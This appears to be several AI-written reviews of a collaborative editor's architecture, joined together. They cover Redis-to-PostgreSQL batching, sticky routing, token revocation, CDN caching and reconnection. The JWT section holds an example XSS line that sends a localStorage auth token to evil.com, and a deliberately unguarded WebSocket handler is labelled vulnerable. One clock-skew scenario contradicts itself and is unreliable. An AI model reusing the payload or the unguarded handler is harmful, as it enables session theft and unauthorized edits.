// Tier 2: Async drain from Redis to PostgreSQL (batched, milliseconds)
const Redis = require('ioredis');
const redis = new Redis(REDIS_URL);
// When an operation arrives, write to Redis Stream (very fast, persistent)
async function persistOperation(documentId, operation) {
// XADD is O(1) and Redis Streams are persistent (AOF)
const streamId = await redis.xadd(
`ops:${documentId}`,
'*', // auto-generate ID
'op', JSON.stringify(operation)
);
// Also publish for real-time broadcast (from section 1.1)
await redis.publish(`doc:${documentId}`, JSON.stringify(operation));
return streamId;
}
// Background worker: drain Redis Streams to PostgreSQL in batches
async function drainToPostgres() {
while (true) {
// Read up to 100 operations from each active document stream.
// With consumer groups, the ID '>' means "entries never delivered to
// this group" (one '>' per stream name).
const streams = await redis.xreadgroup(
'GROUP', 'pg-writer', 'worker-1',
'COUNT', 100,
'BLOCK', 1000, // wait up to 1s for new data
'STREAMS',
...activeDocumentStreams,
...activeDocumentStreams.map(() => '>')
);
if (streams) {
// Batch insert into PostgreSQL with parameterized values
// (never interpolate user-derived JSON into SQL strings)
const ops = streams.flatMap(([stream, entries]) =>
entries.map(([id, fields]) => JSON.parse(fields[1]))
);
const params = [];
const placeholders = ops.map((op, i) => {
params.push(op.documentId, op.revision, JSON.stringify(op));
return `($${i * 3 + 1}, $${i * 3 + 2}, $${i * 3 + 3}::jsonb)`;
});
await db.query(`
INSERT INTO document_operations (document_id, revision, operation)
VALUES ${placeholders.join(',')}
`, params);
// Acknowledge processed entries
for (const [stream, entries] of streams) {
await redis.xack(stream, 'pg-writer', ...entries.map(e => e[0]));
}
}
}
}
Trade-offs:
The Flaw: OT requires serialized processing of operations per document. If 500 users are editing the same document, all operations must be processed sequentially by one entity. With round-robin load balancing, operations for the same document scatter across all servers.
Round-robin distributes users randomly:
Server 1: Alice (doc A), Dave (doc B), Grace (doc A)
Server 2: Bob (doc A), Eve (doc C), Heidi (doc A)
Server 3: Carol (doc A), Frank (doc B), Ivan (doc A)
Document A's operations arrive at 3 different servers.
Who serializes them? Who runs the OT engine?
Every server would need to coordinate via distributed locking. Nightmare.
The Solution: Sticky routing — all connections for a document go to the same server.
# Nginx/HAProxy: route by document ID, not round-robin
upstream api_servers {
# Consistent hashing by document ID
hash $arg_documentId consistent;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# WebSocket upgrade with document-based routing
map $args $document_id {
~documentId=(?<did>[^&]+) $did;
}
server {
location /ws {
proxy_pass http://api_servers;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
# Sticky routing: same document always goes to same server
# Consistent hashing means adding/removing servers only
# remaps ~1/N of documents
}
}
// Server-side: each server is the authoritative OT engine
// for its assigned documents
class Server {
constructor() {
// In-memory OT engines only for documents assigned to THIS server
this.documentEngines = new Map();
}
getOrCreateEngine(documentId) {
if (!this.documentEngines.has(documentId)) {
const engine = new DocumentOTEngine(documentId);
// Load current state from database
engine.initialize();
this.documentEngines.set(documentId, engine);
}
return this.documentEngines.get(documentId);
}
async handleOperation(documentId, clientRevision, operation) {
const engine = this.getOrCreateEngine(documentId);
// Serialized per-document via the single engine instance
// Node.js single-threaded event loop helps here!
return engine.receiveOperation(clientRevision, operation);
}
}
Trade-offs:
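One detail the server sketch above leaves open: the in-memory `documentEngines` map grows without bound. Assuming engine state is recoverable from the operation log (so dropping one only costs a reload on next access), idle engines can be evicted; a minimal sketch:

```javascript
// Sketch: evict OT engines idle longer than maxIdleMs. Assumes engine
// state is recoverable from the persisted operation log.
class EngineCache {
  constructor(maxIdleMs = 5 * 60 * 1000) {
    this.maxIdleMs = maxIdleMs;
    this.engines = new Map(); // documentId -> { engine, lastUsed }
  }

  // factory() builds the engine on a cache miss (e.g. new DocumentOTEngine)
  get(documentId, factory) {
    let entry = this.engines.get(documentId);
    if (!entry) {
      entry = { engine: factory(), lastUsed: 0 };
      this.engines.set(documentId, entry);
    }
    entry.lastUsed = Date.now();
    return entry.engine;
  }

  // Run periodically (e.g. via setInterval); returns live engine count
  evictIdle(now = Date.now()) {
    for (const [id, entry] of this.engines) {
      if (now - entry.lastUsed > this.maxIdleMs) this.engines.delete(id);
    }
    return this.engines.size;
  }
}
```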
The Flaw: PostgreSQL read replicas have replication lag (typically 10ms-1s, but can spike to minutes under load). If a user writes to the primary and then reads from a replica, they may not see their own changes.
t=0ms User saves document title → write goes to PRIMARY
t=5ms User's browser requests document list → read goes to REPLICA
Replica hasn't received the write yet
User doesn't see their new title → "Where did my change go?!"
The Solution: Read-your-own-writes consistency.
// Track the last write position per user session
class ConsistentReader {
// After any write, store the PostgreSQL WAL position
async afterWrite(userId) {
const result = await primaryDb.query(
'SELECT pg_current_wal_lsn() as lsn'
);
await redis.set(
`user:${userId}:last_write_lsn`,
result.rows[0].lsn,
'EX', 30 // expire after 30 seconds
);
}
// Before any read, check if the replica has caught up
async getReadConnection(userId) {
const lastWriteLsn = await redis.get(`user:${userId}:last_write_lsn`);
if (!lastWriteLsn) {
// No recent writes — replica is fine
return replicaDb;
}
// Check if replica has caught up to the user's last write
const result = await replicaDb.query(
'SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn as caught_up',
[lastWriteLsn]
);
if (result.rows[0].caught_up) {
return replicaDb;
}
// Replica hasn't caught up — read from primary
return primaryDb;
}
}
Trade-offs:
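If querying replica LSNs on every read proves too heavyweight, a coarser alternative (a sketch, with an assumed 5-second window) is to pin a user's reads to the primary for a fixed interval after any write:

```javascript
// Coarser read-your-writes: pin a user's reads to the primary for a fixed
// window after any write. windowMs should comfortably exceed typical
// replication lag; the 5s default here is an assumption to tune.
class PrimaryPinning {
  constructor(windowMs = 5000) {
    this.windowMs = windowMs;
    this.lastWrite = new Map(); // userId -> timestamp of last write
  }

  recordWrite(userId, now = Date.now()) {
    this.lastWrite.set(userId, now);
  }

  // true: safe to read from a replica; false: route to the primary
  useReplica(userId, now = Date.now()) {
    const t = this.lastWrite.get(userId);
    return t === undefined || now - t > this.windowMs;
  }
}
```

The trade is precision for simplicity: some reads hit the primary unnecessarily, but no replica LSN queries are needed.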
The Flaw: Partitioning by organization ID means one large organization's data all lives on one partition. If Google (500,000 employees) uses your tool, that partition is 1000x larger than a 50-person startup's partition.
Partition 1: ["TinyStartup LLC"] → 200 documents
Partition 2: ["MegaCorp Inc."] → 5,000,000 documents
Partition 3: ["SmallAgency Co."] → 500 documents
Partition 2 is a massive hot spot.
The Solution: Hash-based partitioning on document ID, with organization as a secondary index.
-- Partition by hash of document_id (even distribution guaranteed)
CREATE TABLE document_operations (
id BIGSERIAL,
document_id UUID NOT NULL,
org_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (document_id);
-- Create partitions (e.g., 16 partitions)
CREATE TABLE document_operations_p0
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 0);
CREATE TABLE document_operations_p1
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 1);
-- ... through p15
-- Organization-level queries use an index, not the partition key
CREATE INDEX idx_ops_org ON document_operations (org_id, created_at);
Trade-offs:
The Flaw: JWTs stored in localStorage are accessible to any JavaScript running on the page. A single XSS vulnerability (including from third-party scripts) exposes every user's session.
// Any XSS payload can steal the token:
fetch('https://evil.com/steal', {
method: 'POST',
body: JSON.stringify({
token: localStorage.getItem('auth_token'),
// Attacker now has a 24-hour valid session
// They can read/modify ALL of the user's documents
})
});
The Solution: HttpOnly cookies with proper security attributes.
// Server: set JWT as HttpOnly cookie (JavaScript cannot access it)
function setAuthCookie(res, token) {
res.cookie('session', token, {
httpOnly: true, // JavaScript cannot read this cookie
secure: true, // only sent over HTTPS
sameSite: 'strict', // not sent on cross-origin requests (CSRF protection)
maxAge: 24 * 60 * 60 * 1000, // 24 hours
path: '/',
domain: '.yourdomain.com'
});
}
// For WebSocket auth (cookies are sent on WS handshake):
const WebSocket = require('ws');
const wss = new WebSocket.Server({ noServer: true });
server.on('upgrade', (request, socket, head) => {
// Parse cookie from the upgrade request headers
const cookies = parseCookies(request.headers.cookie);
const token = cookies.session;
try {
const user = jwt.verify(token, JWT_SECRET);
wss.handleUpgrade(request, socket, head, (ws) => {
ws.user = user;
wss.emit('connection', ws, request);
});
} catch (err) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
});
Trade-offs:
The Flaw: If a user's token is compromised, or they're fired/deactivated, the token remains valid for up to 24 hours. JWTs are stateless — there's no server-side way to invalidate them without additional infrastructure.
t=0h Employee gets JWT (expires t=24h)
t=1h Employee is terminated, account deactivated
t=1h-24h Terminated employee still has full access
Can download/modify/delete all documents they had access to
The Solution: Short-lived access tokens + refresh token rotation + server-side deny list.
// Token strategy:
// - Access token: 15-minute expiry (short-lived, used for API calls)
// - Refresh token: 7-day expiry (stored in HttpOnly cookie, used to get new access tokens)
async function issueTokens(user) {
const accessToken = jwt.sign(
{ userId: user.id, role: user.role, jti: uuid() }, // jti enables deny-list checks
ACCESS_SECRET,
{ expiresIn: '15m' }
);
const tokenFamily = uuid();
const refreshToken = jwt.sign(
{ userId: user.id, tokenFamily },
REFRESH_SECRET,
{ expiresIn: '7d' }
);
// Store refresh token hash in database for revocation
await db.query(`
INSERT INTO refresh_tokens (user_id, token_hash, family, expires_at)
VALUES ($1, $2, $3, NOW() + INTERVAL '7 days')
`, [user.id, hash(refreshToken), tokenFamily]);
return { accessToken, refreshToken };
}
// Fast revocation check using Redis (checked on every request)
async function isTokenRevoked(jti) {
return await redis.sismember('revoked_tokens', jti);
}
// When user is deactivated: revoke all their tokens
async function deactivateUser(userId) {
// Look up outstanding access-token IDs (jti claims recorded at issue
// time; getActiveTokenIds is an assumed helper) and deny-list them
const activeTokenIds = await getActiveTokenIds(userId);
if (activeTokenIds.length > 0) {
await redis.sadd('revoked_tokens', ...activeTokenIds);
}
// Delete all refresh tokens so no new access tokens can be minted
await db.query('DELETE FROM refresh_tokens WHERE user_id = $1', [userId]);
}
Trade-offs:
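The refresh flow itself is not shown above. A sketch of rotation with reuse detection (assumed logic, using an in-memory stand-in for the `refresh_tokens` table): each refresh consumes the presented token and issues a new one in the same family; if an already-consumed token reappears, the family was likely stolen, so the whole family is revoked.

```javascript
// Reuse-detection sketch for refresh-token rotation. A Map stands in for
// the refresh_tokens table; in production the same checks run against
// hashed tokens in PostgreSQL.
class RefreshTokenStore {
  constructor() {
    this.families = new Map(); // family -> currently-valid token hash
    this.seen = new Set();     // every hash this store has ever issued
  }

  issue(family, tokenHash) {
    this.families.set(family, tokenHash);
    this.seen.add(tokenHash);
  }

  // 'ok':      normal rotation, newHash becomes the valid token
  // 'reuse':   an already-consumed token was replayed; family revoked
  // 'unknown': token not recognized at all
  rotate(family, presentedHash, newHash) {
    const current = this.families.get(family);
    if (current === presentedHash) {
      this.issue(family, newHash);
      return 'ok';
    }
    if (this.seen.has(presentedHash)) {
      this.families.delete(family); // revoke the whole family on theft signal
      return 'reuse';
    }
    return 'unknown';
  }
}
```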
The Flaw: The architecture describes authentication (JWT) but not authorization. Once authenticated, can any user open a WebSocket to any document? Every incoming operation must be checked.
// VULNERABLE: no authorization check
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Anyone can send operations to any document!
await handleOperation(documentId, operation);
});
The Solution: Per-document permission checks on every operation.
// Permission model
const PERMISSIONS = {
OWNER: ['read', 'write', 'share', 'delete'],
EDITOR: ['read', 'write'],
COMMENTER: ['read', 'comment'],
VIEWER: ['read']
};
// Check on WebSocket connection AND on every message
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Check permission (cached in Redis for performance)
const permission = await getPermission(ws.user.id, documentId);
if (!permission || !PERMISSIONS[permission].includes('write')) {
ws.send(JSON.stringify({
error: 'FORBIDDEN',
message: 'You do not have write access to this document'
}));
return;
}
await handleOperation(documentId, operation, ws.user);
});
// Cache permissions in Redis (invalidate on share/unshare)
async function getPermission(userId, documentId) {
const cacheKey = `perm:${userId}:${documentId}`;
let permission = await redis.get(cacheKey);
if (!permission) {
const result = await db.query(`
SELECT role FROM document_permissions
WHERE user_id = $1 AND document_id = $2
`, [userId, documentId]);
permission = result.rows[0]?.role || 'NONE';
await redis.set(cacheKey, permission, 'EX', 300); // cache 5 min
}
return permission === 'NONE' ? null : permission;
}
The Flaw: CloudFront caching API responses for 5 minutes is extremely dangerous for a collaborative editor. Users will see stale document lists, stale permissions, and stale content.
Scenario:
t=0:00 Alice shares document with Bob → API returns "shared" status
CloudFront caches this response
t=0:30 Alice REVOKES Bob's access → API returns "not shared"
But CloudFront still has the old cached response
t=0:30-5:00 Bob's browser still gets the cached "shared" response
Bob can still see and potentially access the document
for up to 5 more minutes after access was revoked
The Solution: Separate caching strategies by content type.
// CDN configuration: NEVER cache authenticated API responses
// Only cache static assets and truly public content
// CloudFront behavior configurations:
const cloudFrontBehaviors = {
// Static assets: aggressive caching
'/static/*': {
cachePolicyId: 'CachingOptimized', // cache forever, bust with filename hash
ttl: { default: 86400, max: 31536000 },
compress: true
},
// Public marketing pages: moderate caching
'/public/*': {
cachePolicyId: 'CachingOptimized',
ttl: { default: 300 }, // 5 min is fine for public content
},
// API endpoints: NO CDN CACHING
'/api/*': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer', // forward all headers
// Let the application server set its own Cache-Control headers
},
// WebSocket: pass through entirely
'/ws': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer',
}
};
// Application-level caching headers (set by the API server)
app.get('/api/documents', (req, res) => {
res.set({
'Cache-Control': 'private, no-store', // never cache user-specific data
'Vary': 'Authorization, Cookie'
});
// ... return documents
});
app.get('/api/documents/:id/content', (req, res) => {
// Document content changes constantly in a collaborative editor
res.set('Cache-Control', 'no-store');
// ... return content
});
Trade-offs: disabling CDN caching on /api/* pushes all API traffic to the origin, raising load and latency for read-heavy endpoints; for authenticated, per-user responses correctness has to win, and truly public API responses can be selectively re-cached later.
The Flaw: The architecture doesn't address what happens when a WebSocket connection drops (network switch, laptop sleep, mobile network change). Without explicit handling, users will type into a disconnected editor and lose everything.
The Solution: Client-side operation buffering with automatic reconnection.
class ResilientDocumentConnection {
constructor(documentId) {
this.documentId = documentId;
this.pendingOps = []; // operations not yet acknowledged by server
this.bufferedOps = []; // operations created while disconnected
this.serverRevision = 0;
this.state = 'disconnected'; // disconnected | connecting | synchronized
this.reconnectAttempt = 0;
}
connect() {
this.state = 'connecting';
this.ws = new WebSocket(
`wss://api.example.com/ws?documentId=${this.documentId}`
);
this.ws.onopen = () => {
this.state = 'synchronized';
this.reconnectAttempt = 0;
// Send any operations that were buffered while offline
for (const op of this.bufferedOps) {
this.sendOperation(op);
}
this.bufferedOps = [];
};
this.ws.onclose = (event) => {
this.state = 'disconnected';
this.scheduleReconnect();
};
this.ws.onerror = () => {
// onclose will fire after onerror
};
this.ws.onmessage = (event) => {
this.handleServerMessage(JSON.parse(event.data));
};
}
// User makes an edit
applyLocalOperation(operation) {
// Always apply locally immediately (optimistic)
this.editor.apply(operation);
if (this.state === 'synchronized') {
this.sendOperation(operation);
} else {
// Buffer for later — user can keep typing offline
this.bufferedOps.push(operation);
this.showOfflineIndicator();
}
}
scheduleReconnect() {
// Exponential backoff with jitter
const baseDelay = Math.min(1000 * Math.pow(2, this.reconnectAttempt), 30000);
const jitter = baseDelay * 0.5 * Math.random();
const delay = baseDelay + jitter;
this.reconnectAttempt++;
console.log(`Reconnecting in ${Math.round(delay)}ms (attempt ${this.reconnectAttempt})`);
setTimeout(() => this.connect(), delay);
}
showOfflineIndicator() {
// Show yellow "offline — changes will sync when reconnected" banner
// Users MUST know their changes aren't saved yet
document.getElementById('sync-status').className = 'offline';
}
}
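The class above calls `this.handleServerMessage` without defining it. A minimal, self-contained sketch of that handler (message shapes are assumptions, and it is shown here over a plain state object rather than the class):

```javascript
// Minimal server-message handler: acks clear the pending queue and
// advance the known server revision; remote operations are queued for
// the editor/OT layer to apply.
function handleServerMessage(state, msg) {
  switch (msg.type) {
    case 'ack': // server confirmed one of our operations
      state.pendingOps = state.pendingOps.filter((op) => op.id !== msg.opId);
      state.serverRevision = msg.revision;
      break;
    case 'operation': // another client's edit, relayed by the server
      state.serverRevision = msg.revision;
      state.remoteOps.push(msg);
      break;
  }
  return state;
}
```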
Trade-offs: optimistic local application means users may briefly see state the server later transforms; the offline buffer can grow without bound on long disconnects (cap it or persist to IndexedDB); and buffered edits still need OT/CRDT merging against everything that happened while the client was offline.
The Flaw: Long-lived WebSocket connections accumulate state. Without proper cleanup, servers leak memory from abandoned connections, dead subscriptions, and orphaned OT engine instances.
// Common leak patterns:
// LEAK 1: Client closes browser without clean disconnect
// The TCP connection may stay "open" on the server for minutes
// LEAK 2: OT engines for documents that no one is editing anymore
// stay in memory indefinitely
// LEAK 3: Redis pub/sub subscriptions for documents never unsubscribed
The Solution: Heartbeat monitoring + resource lifecycle management.
class ConnectionManager {
constructor() {
this.connections = new Map(); // ws → metadata
this.documentSubscribers = new Map(); // documentId → Set<ws>
}
addConnection(ws, user, documentId) {
ws.isAlive = true;
ws.documentId = documentId;
this.connections.set(ws, {
user,
documentId,
connectedAt: Date.now(),
lastActivity: Date.now()
});
// Track subscribers per document
if (!this.documentSubscribers.has(documentId)) {
this.documentSubscribers.set(documentId, new Set());
redis.subscribe(`doc:${documentId}`); // subscribe on first user
}
this.documentSubscribers.get(documentId).add(ws);
// Heartbeat: client must respond to pings
ws.on('pong', () => { ws.isAlive = true; });
ws.on('close', () => this.removeConnection(ws));
ws.on('error', () => this.removeConnection(ws));
}
removeConnection(ws) {
const meta = this.connections.get(ws);
if (!meta) return;
this.connections.delete(ws);
// Remove from document subscribers
const subs = this.documentSubscribers.get(meta.documentId);
if (subs) {
subs.delete(ws);
// If no more subscribers for this document, clean up
if (subs.size === 0) {
this.documentSubscribers.delete(meta.documentId);
redis.unsubscribe(`doc:${meta.documentId}`);
// Unload OT engine after a grace period
// (in case someone reconnects quickly)
setTimeout(() => {
if (!this.documentSubscribers.has(meta.documentId)) {
documentEngines.delete(meta.documentId);
console.log(`Unloaded OT engine for doc ${meta.documentId}`);
}
}, 60000); // 60-second grace period
}
}
try { ws.terminate(); } catch (e) {}
}
// Run every 30 seconds: detect dead connections
startHeartbeat() {
setInterval(() => {
for (const [ws, meta] of this.connections) {
if (!ws.isAlive) {
console.log(`Dead connection detected: user ${meta.user.id}`);
this.removeConnection(ws);
continue; // keep checking the remaining connections
}
ws.isAlive = false;
ws.ping(); // client must respond with pong within 30s
}
}, 30000);
}
}
The Flaw: Round-robin assigns connections evenly at connection time, but WebSocket connections are long-lived. Over time, as servers are added/removed or connections have different lifetimes, load becomes severely unbalanced.
Scenario: Start with 2 servers, each gets 5000 connections.
Add server 3 for scaling.
Server 1: 5000 connections (existing, long-lived)
Server 2: 5000 connections (existing, long-lived)
Server 3: 0 connections (new, gets only NEW connections)
Round-robin sends new connections equally, but existing connections
don't rebalance. Server 3 is idle while 1 and 2 are overloaded.
The Solution: Least-connections routing + connection count awareness.
upstream api_servers {
# Use least_conn instead of round-robin for WebSocket connections
# This sends new connections to the server with fewest active connections
least_conn;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# BUT: combine with consistent hashing for document routing (from 3.1)
# Use a two-tier approach:
# Tier 1: Document-to-server assignment (consistent hash)
# Tier 2: Within the assigned server, least-connections for load awareness
// Active rebalancing: when a new server joins, gradually migrate documents
async function rebalanceDocuments(newServerList) {
const currentAssignments = await getDocumentAssignments(); // Map<docId, server>
for (const [docId, oldServer] of currentAssignments) {
const newServer = consistentHash(docId, newServerList);
if (oldServer !== newServer) {
// Gracefully migrate: tell clients to reconnect to new server
await notifyClientsToReconnect(docId, newServer);
// Stagger migrations to avoid thundering herd
await sleep(100);
}
}
}
┌────┬──────────────────────────────────────┬──────────┬────────────┐
│ # │ Issue │ Severity │ Effort │
├────┼──────────────────────────────────────┼──────────┼────────────┤
│ 1 │ Last-write-wins destroys data (1.2) │ CRITICAL │ High │
│ 2 │ JWT in localStorage / XSS (4.1) │ CRITICAL │ Medium │
│ 3 │ No document authorization (4.3) │ CRITICAL │ Medium │
│ 4 │ 30s snapshot data loss (2.1) │ HIGH │ Medium │
│ 5 │ CDN caching API responses (5.1) │ HIGH │ Low │
│ 6 │ 2-second cross-server delay (1.1) │ HIGH │ Low │
│ 7 │ Client clock timestamps (1.3) │ HIGH │ Low │
│ 8 │ No reconnection handling (6.1) │ HIGH │ Medium │
│ 9 │ JWT no revocation (4.2) │ MEDIUM │ Medium │
│ 10 │ Split-brain document routing (3.1) │ MEDIUM │ Medium │
│ 11 │ HTML snapshot bloat/XSS (2.2) │ MEDIUM │ Medium │
│ 12 │ Org-based hot spots (3.3) │ MEDIUM │ Low │
│ 13 │ Read replica staleness (3.2) │ MEDIUM │ Medium │
│ 14 │ PG write bottleneck (2.3) │ LOW* │ High │
│ 15 │ WebSocket memory leaks (6.2) │ LOW* │ Medium │
│ 16 │ Round-robin imbalance (7.1) │ LOW* │ Low │
└────┴──────────────────────────────────────┴──────────┴────────────┘
* LOW at current scale, becomes HIGH at scale
The core issue is that this architecture treats a real-time collaborative editor like a traditional CRUD application. The fundamental shift needed is from state-based synchronization (snapshots, last-write-wins) to operation-based synchronization (OT/CRDTs, operation logs, event sourcing). That single conceptual change resolves issues 1, 2, 3, 4, and 7 simultaneously.
I'll analyze this architecture systematically and identify critical issues with their solutions.
Issue: Users connected to different servers can't see each other's changes in real-time due to 2-second polling delay.
Race Condition:
Time 0: User A (Server 1) types "Hello"
Time 0.5: User B (Server 2) types "Hi"
Time 2: Server 2 polls and gets "Hello", but User A never sees "Hi" until next poll
Solutions: replace cross-server polling with push-based fan-out, e.g. a message broker (Redis Pub/Sub, NATS, or Kafka) that every API server subscribes to; propagation drops from seconds to milliseconds, at the cost of one more critical infrastructure dependency.
Issue: Client-side timestamps are unreliable for conflict resolution.
Race Condition:
User A (clock +30s): Edit at "12:00:30" (actual 12:00:00)
User B (correct clock): Edit at "12:00:15" (actual 12:00:15)
Result: User A's older edit wins due to clock skew
Solution: Server-side Lamport timestamps or vector clocks
// Server assigns logical timestamps
const change = {
content: edit.content,
serverTimestamp: Date.now(),
logicalClock: ++serverLogicalClock,
serverId: process.env.SERVER_ID
}
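A Lamport clock is the simplest server-side logical timestamp: increment on every local event, and on receiving a remote event take max(local, remote) + 1. A minimal sketch (assumes single-threaded event handling per server, which matches Node's model):

```javascript
// Minimal Lamport clock: orders events causally without trusting
// anyone's wall clock. Ties across servers are broken by serverId.
class LamportClock {
  constructor() { this.time = 0; }
  tick() {
    // Local event (e.g., an edit originated on this server)
    return ++this.time;
  }
  receive(remoteTime) {
    // Merge on receiving a remote event: jump past anything we've seen
    this.time = Math.max(this.time, remoteTime) + 1;
    return this.time;
  }
}
```

Unlike the vector clocks some answers propose, a Lamport clock cannot detect concurrency; it only guarantees that causally-later events get larger timestamps, which is already enough to fix the clock-skew problem above.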
Issue: Multiple servers writing simultaneously can cause data corruption.
Race Condition:
-- Server 1 and Server 2 simultaneously:
UPDATE documents SET content = 'Version A', version = version + 1 WHERE id = 123;
UPDATE documents SET content = 'Version B', version = version + 1 WHERE id = 123;
-- One update gets lost
Solution: Optimistic locking with version numbers
UPDATE documents
SET content = $1, version = version + 1, updated_at = NOW()
WHERE id = $2 AND version = $3
RETURNING version;
-- If no rows affected, retry with conflict resolution
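The "retry with conflict resolution" step can be a small wrapper around that versioned UPDATE. A sketch with the read and the compare-and-swap write abstracted out (`readDoc` and `casWrite` are stand-ins for the SELECT and the UPDATE ... WHERE version = $3 above):

```javascript
// Optimistic-lock retry loop: re-read fresh state, re-apply the edit,
// and retry when the versioned write reports a conflict.
async function updateWithRetry(readDoc, casWrite, applyEdit, maxRetries = 5) {
  for (let attempt = 0; attempt < maxRetries; attempt++) {
    const { content, version } = await readDoc();
    const updated = applyEdit(content);
    // casWrite returns false when another writer bumped the version first
    if (await casWrite(updated, version)) {
      return { content: updated, version: version + 1 };
    }
  }
  throw new Error('Update failed after retries: too much contention');
}
```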
Issue: Single PostgreSQL instance becomes write bottleneck as user count grows.
Solutions:
// Batch operations every ~100ms to amortize per-write overhead
const batch = operations.splice(0, MAX_BATCH_SIZE);
const placeholders = batch.map((_, i) => `($${i*3+1}, $${i*3+2}, $${i*3+3})`).join(', ');
await db.query(`INSERT INTO operations (doc_id, operation, timestamp) VALUES ${placeholders}`,
batch.flatMap(op => [op.docId, op.operation, op.timestamp]));
Issue: Each server has practical limits on concurrent WebSocket connections (file descriptors, per-socket kernel and heap memory); the often-cited ~65k figure is a per-client ephemeral-port limit, not a hard cap on inbound connections to the server.
Solution: Connection pooling and WebSocket clustering
// Use Redis adapter for Socket.io clustering
const io = require('socket.io')(server);
io.adapter(require('socket.io-redis')({ host: 'redis-cluster' }));
Issue: Each connection stores document state in memory.
Solution: Stateless WebSockets with Redis for session storage
// Store connection state in Redis
await redis.hset(`session:${socketId}`, {
userId: user.id,
documentId: doc.id,
lastSeen: Date.now()
});
Issue: 2-second polling can miss rapid changes or cause ordering issues.
Solution: Change Data Capture (CDC) with PostgreSQL logical replication
-- Enable logical replication
CREATE PUBLICATION doc_changes FOR TABLE documents, document_operations;
-- Consume changes in real-time instead of polling
Issue: 24-hour localStorage JWTs can't be revoked and are XSS vulnerable.
Solution: Short-lived access tokens + secure refresh tokens
// 15-minute access token + httpOnly refresh cookie
const accessToken = jwt.sign(payload, secret, { expiresIn: '15m' });
res.cookie('refreshToken', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict'
});
Issue: 5-minute API response caching serves stale document data.
Solution: Cache invalidation strategy
// Invalidate CDN cache on document updates
await cloudfront.createInvalidation({
DistributionId: 'DISTRIBUTION_ID',
InvalidationBatch: {
Paths: [`/api/documents/${documentId}*`],
CallerReference: Date.now().toString()
}
}).promise(); // AWS SDK v2 style; invalidations can take minutes to propagate
Issue: Storing complete HTML every 30 seconds wastes storage and bandwidth.
Solution: Delta compression with operational transforms
// Store only operations, reconstruct document as needed
const operations = await db.query(
'SELECT * FROM document_operations WHERE doc_id = $1 ORDER BY timestamp',
[docId]
);
const document = applyOperations(baseDocument, operations);
Client → WebSocket → Message Broker → All Servers → Clients
                          ↓
              Event Store (PostgreSQL)
Replace last-write-wins with proper collaborative editing algorithms:
// Use libraries like Yjs or ShareJS
import * as Y from 'yjs'
const ydoc = new Y.Doc()
const ytext = ydoc.getText('content')
// Automatic conflict resolution without data loss
This architecture addresses the major issues while maintaining scalability and reliability for a production collaborative editor.
This architecture has critical flaws that will cause data loss, security vulnerabilities, and poor user experience at scale. I've identified 18 distinct issues across 6 categories. Several are severe enough to cause silent data corruption in production today.
Severity: CRITICAL — Silent data loss in production
Scenario demonstrating the problem:
─────────────────────────────────────────────────────
User A (clock: accurate) User B (clock: 5min fast)
─────────────────────────────────────────────────────
12:00:00 - Types "Hello" 11:59:00 - Types "World"
(clock is ahead, so B's
timestamp is EARLIER)
Result: "Hello" wins because it has the later timestamp
BUT User B typed after User A in wall-clock time.
Worse scenario:
User B's laptop has clock skewed +1 hour.
User B can now PERMANENTLY win every conflict
for an entire hour, silently discarding all other
users' changes with no indication to anyone.
─────────────────────────────────────────────────────
The deeper problem: LWW at the paragraph level means any concurrent edit to the same paragraph results in one user's work being silently discarded. There's no merge, no notification, no recovery.
Solution: Operational Transformation (OT) or CRDTs
// Current broken approach
function resolveConflict(changeA, changeB) {
// Silent data loss - one change disappears forever
return changeA.clientTimestamp > changeB.clientTimestamp
? changeA
: changeB;
}
// Better approach: Vector clocks for causal ordering
class VectorClock {
constructor(nodeId) {
this.nodeId = nodeId;
this.clock = {}; // { userId: counter }
}
increment() {
this.clock[this.nodeId] = (this.clock[this.nodeId] || 0) + 1;
return { ...this.clock };
}
// Merge clocks when receiving remote event
merge(remoteClock) {
for (const [node, time] of Object.entries(remoteClock)) {
this.clock[node] = Math.max(this.clock[node] || 0, time);
}
}
// Returns: 'before' | 'after' | 'concurrent'
compare(otherClock) {
let aAheadOfB = false;
let bAheadOfA = false;
const allNodes = new Set([
...Object.keys(this.clock),
...Object.keys(otherClock)
]);
for (const node of allNodes) {
const aTime = this.clock[node] || 0;
const bTime = otherClock[node] || 0;
if (aTime > bTime) aAheadOfB = true;
if (bTime > aTime) bAheadOfA = true;
}
if (aAheadOfB && !bAheadOfA) return 'after';
if (bAheadOfA && !aAheadOfB) return 'before';
if (aAheadOfB && bAheadOfA) return 'concurrent'; // True conflict
return 'equal';
}
}
// Production recommendation: Use CRDT library (Yjs or Automerge)
// Yjs example - handles all of this automatically:
import * as Y from 'yjs'
const ydoc = new Y.Doc()
const ytext = ydoc.getText('document')
// This merge is mathematically guaranteed to converge
// to the same result on all clients regardless of
// operation order or network delays
ytext.insert(0, 'Hello') // User A
ytext.insert(5, ' World') // User B - both changes preserved
Trade-offs:
| Approach | Correctness | Complexity | Bandwidth |
|---|---|---|---|
| LWW (current) | ❌ Data loss | Low | Low |
| OT | ✅ Correct | Very High | Medium |
| CRDT (Yjs) | ✅ Correct | Medium (library) | Higher |
| CRDT (Automerge) | ✅ Correct | Medium (library) | Highest |
Recommendation: Use Yjs — battle-tested, used by major editors, handles offline sync, has existing WebSocket provider.
Severity: HIGH — Data loss window + storage explosion
Problems with this approach:
┌─────────────────────────────────────────────────────────┐
│ User types for 29 seconds → server crashes │
│ Result: 29 seconds of work LOST with no warning │
│ │
│ Storage growth example:                                 │
│   Document: 50KB HTML, snapshotted every 30 seconds     │
│   2 snapshots/min × 1,440 min/day × 50KB ≈ 144MB/day    │
│   For 1000 concurrent documents ≈ 144GB/day             │
│ │
│ No change history = no undo beyond browser state │
│ No audit trail = compliance nightmare │
